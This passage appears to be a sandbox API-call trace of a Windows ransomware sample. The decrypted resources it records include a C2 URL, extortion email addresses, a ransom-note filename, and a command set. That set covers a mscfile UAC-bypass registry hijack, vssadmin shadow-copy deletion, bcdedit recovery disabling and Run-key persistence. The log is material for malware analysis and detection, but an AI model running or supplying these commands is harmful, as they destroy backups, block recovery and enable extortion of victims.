lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0098.022] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0098.022] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0098.022] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0098.022] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0098.022] LockResource (hResData=0x50d55c) returned 0x50d55c [0098.022] FreeResource (hResData=0x50d55c) returned 0 [0098.022] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.022] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.022] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.022] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.022] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1524f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1524f60, cbMultiByte=38, lpWideCharStr=0x151de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.023] FreeResource (hResData=0x50d64c) returned 0 [0098.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1524f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14dcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0098.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14dcd18, cbMultiByte=239, lpWideCharStr=0x14e2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCurrentThreadId () returned 0xbc0 [0098.023] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.023] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14d399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0098.023] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14d399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0098.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0098.073] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0098.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0098.074] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0098.075] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0098.076] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0098.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0098.078] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14d39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0098.079] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x14bc63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0098.079] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0098.079] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0098.079] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0098.079] LockResource (hResData=0x50d72c) returned 0x50d72c [0098.079] FreeResource (hResData=0x50d72c) returned 0 [0098.080] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.080] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.080] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.080] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x151deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.080] FreeResource (hResData=0x50d64c) returned 0 [0098.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x152500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14be688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0098.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14be688, cbMultiByte=1410, lpWideCharStr=0x14d9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThreadId () returned 0xbc0 [0098.080] GetCurrentThread () returned 0xfffffffe [0098.080] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0098.080] GetLastError () returned 0x3f0 [0098.080] GetCurrentProcess () returned 0xffffffff [0098.080] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0098.080] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14d7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14d7ae0, ReturnLength=0x12fc60) returned 1 [0098.080] CloseHandle (hObject=0xb8) returned 1 [0098.081] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14d7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14d7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0098.081] EqualSid (pSid1=0x726428*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14d7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0098.081] GetCurrentProcess () returned 0xffffffff [0098.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0098.081] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0098.081] GetLastError () returned 0x7a [0098.081] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7276c8 [0098.081] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7276c8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7276c8, ReturnLength=0x12fc64) returned 1 [0098.081] GetSidSubAuthorityCount (pSid=0x7276d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7276d1 [0098.081] GetSidSubAuthority (pSid=0x7276d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7276d8 [0098.081] LocalFree (hMem=0x7276c8) returned 0x0 [0098.081] CloseHandle (hObject=0xb8) returned 1 [0098.081] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0098.081] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0098.082] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0098.083] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.083] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0098.083] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0098.083] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0098.083] LockResource (hResData=0x516824) returned 0x516824 [0098.083] FreeResource (hResData=0x516824) returned 0 [0098.083] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0098.083] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0098.083] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0098.083] LockResource (hResData=0x50d64c) returned 0x50d64c [0098.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0098.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1525008, cbMultiByte=38, lpWideCharStr=0x151deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0098.083] FreeResource (hResData=0x50d64c) returned 0 [0098.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x152500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] GetCurrentThreadId () returned 0xbc0 [0098.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0098.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14b0128, cbMultiByte=615, lpWideCharStr=0x14bc65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.084] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0098.085] CompareStringW (Locale=0x400, 